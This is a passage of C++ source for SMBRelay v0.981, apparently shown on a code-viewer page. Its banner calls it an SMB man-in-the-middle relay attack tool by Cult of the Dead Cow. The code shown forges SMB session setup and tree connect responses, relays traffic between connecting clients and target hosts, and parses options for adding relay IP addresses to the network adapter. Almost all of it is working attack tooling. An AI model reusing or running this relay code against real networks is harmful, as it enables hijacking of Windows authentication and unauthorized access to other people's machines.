📄 smbrelay.cpp
字号:
psessionsetupandresponse->AndXOffset = 0;
}
else
{
PTREE_CONNECT_ANDRESPONSEHEADER ptreeconnectand = (PTREE_CONNECT_ANDRESPONSEHEADER)( (char *)psmbheader + psessionsetupandresponse->AndXOffset );
ptreeconnectand->Len = TREE_CONNECT_ANDRESPONSEHEADER_LEN;
ptreeconnectand->AndXCommand = SMB_NONE;
ptreeconnectand->AndXOffset = 0;
ptreeconnectand->AndXReserved = 0;
ptreeconnectand->OptionalSupport = 0;
char *ptr = (char *)(ptreeconnectand + 1);
strcpy(ptr, "IPC");
ptreeconnectand->ByteCount = strlen(ptr) + 3;
ptr += strlen(ptr) + 1;
*ptr = 0;
ptr++;
*ptr = 0;
pnbsessionheader->Length = htons(ntohs(pnbsessionheader->Length) + ptreeconnectand->Len * 2 + ptreeconnectand->ByteCount + 4);
}
x = send(relayconnectionsock, buff, ntohs(pnbsessionheader->Length) + 4, 0);
printf(" *** Sent SMB Session setup response for relay to %s\n", hostname);
bDoSend = FALSE;
}
break;
}
}
}
}
if (bContinue && bDoSend && datalen > 0)
{
totallen = 0;
do
{
x = send(outsock, buff + totallen, datalen - totallen, 0);
if (x == 0)
{
bContinue = FALSE;
bConnected = FALSE;
printf("Target %s disconnected durring send\n", hostname);
}
else if (x == -1)
{
DWORD err = WSAGetLastError();
if (err == WSAEWOULDBLOCK)
Sleep(5);
else
{
bContinue = FALSE;
bConnected = FALSE;
printf("Error %d sending data to target %s\n", err, hostname);
}
}
else
{
totallen += x;
}
} while (bContinue && totallen < datalen && !g_bQuit);
}
if (bContinue && !g_bQuit)
{
datalen = recv(outsock, buff, sizeof(NBSESSIONHEADER), 0);
if (datalen < 1)
{
if (datalen == 0)
{
printf("Target %s connection disconnected\n", hostname);
bContinue = FALSE;
bConnected = FALSE;
}
else
{
DWORD err = WSAGetLastError();
if (err != WSAEWOULDBLOCK)
{
bContinue = FALSE;
bConnected = FALSE;
printf("Error %d receiving header from target %s\n", err, hostname);
}
}
}
else
{
totallen = ntohs(pnbsessionheader->Length) + 4;
if (g_DebugLevel > 1)
printf("Received response header, expecting %d bytes from target %s\n", totallen, hostname);
while (bContinue && datalen < totallen && !g_bQuit)
{
x = recv(outsock, buff + datalen, totallen - datalen, 0);
if (x > 0)
datalen += x;
else
{
if (x == 0)
{
printf("Target %s connection disconnected\n", hostname);
bContinue = FALSE;
bConnected = FALSE;
}
else
{
DWORD err = WSAGetLastError();
if (err == WSAEWOULDBLOCK)
Sleep(5);
else
{
bContinue = FALSE;
bConnected = FALSE;
printf("Error %d receiving data from target %s\n", err, hostname);
}
}
}
}
}
if (bContinue && datalen > 0 && !g_bQuit)
{
if (g_DebugLevel > 0)
printf("Received %d byte response from target %s\n", datalen, hostname);
if (pnbsessionheader->Flags != 0)
printf("Response Flags: 0x%04x target %s\n", pnbsessionheader->Flags, hostname );
totallen = 0;
do
{
x = send(relayconnectionsock, buff + totallen, datalen - totallen, 0);
if (x == 0)
{
bContinue = FALSE;
printf("Relay host disconnected durring send from target %s\n", hostname);
}
else if (x == -1)
{
DWORD err = WSAGetLastError();
if (err == WSAEWOULDBLOCK)
Sleep(5);
else
{
bContinue = FALSE;
printf("Error %d sending data to relay host from target %s\n", err, hostname);
}
}
else
{
totallen += x;
}
} while (bContinue && totallen < datalen && !g_bQuit);
}
}
if (datalen < 1)
Sleep(5);
} while (bContinue && !g_bQuit);
printf(" *** Relay disconnected from target %s\n", hostname);
closesocket(relayconnectionsock);
}
exitrelay:
if (g_bAddRelayIP)
{
DeleteIPAddress(NTEContext);
printf("Deleted relay IP address %s for target %s\n", inet_ntoa( sockaddr.sin_addr), hostname);
}
}
closesocket(outsock);
printf("*** Target %s Disconnected\n", hostname);
// remove host from list
ConnectedList[hostnumber] = 0;
// clean up end of list
while (ConnectedSize > 0 && ConnectedList[ConnectedSize] == 0)
ConnectedSize--;
}
void SignalHandler(int sig)
{
printf("Termination requested...\n");
g_bQuit = TRUE;
}
void Usage( )
{
puts("Usage: smbrelay [options]");
puts(" Options:");
puts(" /D num - Set debug level, current valid levels: 0 (none), 1, 2");
puts(" Defaults to 0");
puts(" /E - Enumerates interfaces and their indexes");
puts(" /IL num - Set the interface index to use when adding local IP addresses");
puts(" /IR num - Set the interface index to use when adding relay IP addresses");
puts(" Defaults to 1. Use /E to display the adapter indexes");
puts(" /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections");
puts(" Use + to first add the IP address to the NIC");
puts(" Defaults to primary host IP");
puts(" /R[-] IP - Set the starting relay IP address to use");
puts(" Use - to NOT first add each relay IP address to the NIC");
puts(" Defaults to 192.1.1.1");
puts(" /S name - Set the source machine name");
puts(" Defaults to CDC4EVER");
}
int main(int argc, char* argv[])
{
SOCKET tcpsock, inconsock;
WSADATA wsadata;
BOOL b;
DWORD d, NTEContext, NTEInstance;
LPHOSTENT phostent;
SOCKADDR_IN sockaddr;
int x;
puts("SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack");
puts(" Copyright 2001: Sir Dystic, Cult of the Dead Cow");
puts(" Send complaints, ideas and donations to sirdystic@cultdeadcow.com");
for (x = 1; x < argc; x++)
{
if (argv[x][0] == '/')
{
if (stricmp(argv[x], "/IR") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /IR\n");
Usage();
return 0;
}
x++;
g_RelayInterfaceNumber = strtoul(argv[x], NULL, 16);
}
else if (stricmp(argv[x], "/IL") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /IL\n");
Usage();
return 0;
}
x++;
g_LocalInterfaceNumber = strtoul(argv[x], NULL, 16);
}
else if (stricmp(argv[x], "/D") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /D\n");
Usage();
return 0;
}
x++;
g_DebugLevel = atoi(argv[x]);
}
else if (stricmp(argv[x], "/E") == 0)
{
DWORD e, NumOfInterfaces = 0;
e = GetNumberOfInterfaces(&NumOfInterfaces);
if (e != NO_ERROR)
{
printf("Unable to retrieve number of interfaces: Error %d - %s\n", e, StrError(e));
}
else
{
DWORD buffsize = sizeof(MIB_IFROW) * (NumOfInterfaces + 5);
PMIB_IFTABLE piftable = (PMIB_IFTABLE)malloc(buffsize);
e = GetIfTable(piftable, &buffsize, FALSE);
if (e != ERROR_SUCCESS)
{
printf("Unable to get interface table: Error %d - %s\n", e, StrError(e));
}
else
{
for (e = 0; e < piftable->dwNumEntries; e++)
{
printf("[%x] %s - %s\n", piftable->table[e].dwIndex, GetInterfaceType(piftable->table[e].dwType), piftable->table[e].bDescr );
}
}
///
free(piftable);
}
return 0;
}
else if (stricmp(argv[x], "/L") == 0 || stricmp(argv[x], "/L+") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /L\n");
Usage();
return 0;
}
if (argv[x][2] == '+')
g_bAddLocalIP = TRUE;
x++;
g_LocalIP = inet_addr(argv[x]);
if (g_LocalIP == INADDR_NONE)
{
fprintf(stdout, "Bad IP: \"%s\"\n", argv[x]);
Usage();
return 0;
}
}
else if (stricmp(argv[x], "/R") == 0 || stricmp(argv[x], "/R-") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /R\n");
Usage();
return 0;
}
if (argv[x][2] == '-')
g_bAddRelayIP = FALSE;
x++;
g_RelayStartIP = inet_addr(argv[x]);
if (g_RelayStartIP == INADDR_NONE)
{
fprintf(stdout, "Bad IP: \"%s\"\n", argv[x]);
Usage();
return 0;
}
}
else if (stricmp(argv[x], "/S") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /S\n");
Usage();
return 0;
}
x++;
strncpy(g_SourceName, argv[x], 15);
g_SourceName[15] = 0;
strupr(g_SourceName);
}
else if (stricmp(argv[x], "/?") == 0 || stricmp(argv[x], "/HELP") == 0)
{
Usage();
return 0;
}
else
{
fprintf(stdout, "Bad option: \"%s\"\n", argv[x] );
Usage();
return 0;
}
}
}
memset(&wsadata, 0, sizeof(wsadata));
WSAStartup(MAKEWORD(1, 1), &wsadata);
if (g_bAddLocalIP)
{
if (g_LocalInterfaceNumber == 0)
{
GetBestInterface(g_LocalIP, &g_LocalInterfaceNumber);
}
MIB_IFROW ifrow;
memset(&ifrow, 0, sizeof(ifrow));
ifrow.dwIndex = g_LocalInterfaceNumber;
d = GetIfEntry(&ifrow);
if (d == NO_ERROR)
{
printf("Using local adapter index %x: %s\n", g_LocalInterfaceNumber, ifrow.bDescr);
}
else
{
printf("Local adapter index %x may be invalid! Error %d: %s\n", g_LocalInterfaceNumber, d, StrError(d));
}
}
if (g_bAddRelayIP)
{
MIB_IFROW ifrow;
memset(&ifrow, 0, sizeof(ifrow));
ifrow.dwIndex = g_RelayInterfaceNumber;
d = GetIfEntry(&ifrow);
if (d == NO_ERROR)
{
printf("Using relay adapter index %x: %s\n", g_RelayInterfaceNumber, ifrow.bDescr);
}
else
{
printf("Relay adapter index %x may be invalid! Error %d: %s\n", g_RelayInterfaceNumber, d, StrError(d));
}
}
tcpsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (tcpsock == INVALID_SOCKET)
{
printf("Error %d creating socket\n", GETSOCKETERROR() );
return 0;
}
b = TRUE;
if (setsockopt(tcpsock, SOL_SOCKET, SO_REUSEADDR, (const char *)&b, sizeof(b) ) == SOCKET_ERROR)
{
printf("Error %d setting socket option SO_REUSEADDR\n", GETSOCKETERROR() );
closesocket(tcpsock);
return 0;
}
if (g_LocalIP == INADDR_NONE)
{
char buff[64];
if (gethostname((char *)buff, sizeof(buff) ) == SOCKET_ERROR)
{
printf("Error %d getting local host name\n", GETSOCKETERROR() );
closesocket(tcpsock);
return 0;
}
phostent = gethostbyname((char *)buff);
if (phostent == NULL)
{
printf("Error %d getting local address for name %s\n", GETSOCKETERROR(), buff );
closesocket(tcpsock);
return 0;
}
g_LocalIP = ((struct in_addr *) phostent->h_addr)->s_addr;
}
sockaddr.sin_addr.s_addr = g_LocalIP;
sockaddr.sin_port = htons(g_LocalPort);
sockaddr.sin_family = AF_INET;
if (g_bAddLocalIP)
{
DWORD Netmask = inet_addr("255.255.255.0");
d = AddIPAddress(g_LocalIP, Netmask, g_LocalInterfaceNumber, &NTEContext, &NTEInstance);
if (d != NO_ERROR)
printf("Error %d adding IP address to interface %x: %s\n", d, g_LocalInterfaceNumber, StrError(d));
else
printf("Local IP address added to interface %x\n", g_LocalInterfaceNumber);
}
if (bind(tcpsock, (LPSOCKADDR)&sockaddr, sizeof(sockaddr) ) == SOCKET_ERROR)
{
d = GETSOCKETERROR();
printf("Error %u binding to port %d at address %s\n", d, g_LocalPort, inet_ntoa(sockaddr.sin_addr) );
closesocket(tcpsock);
return 0;
} else {
printf("Bound to port %d on address %s\n", g_LocalPort, inet_ntoa(sockaddr.sin_addr) );
}
if (listen(tcpsock, SOMAXCONN) == SOCKET_ERROR)
{
d = GETSOCKETERROR();
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -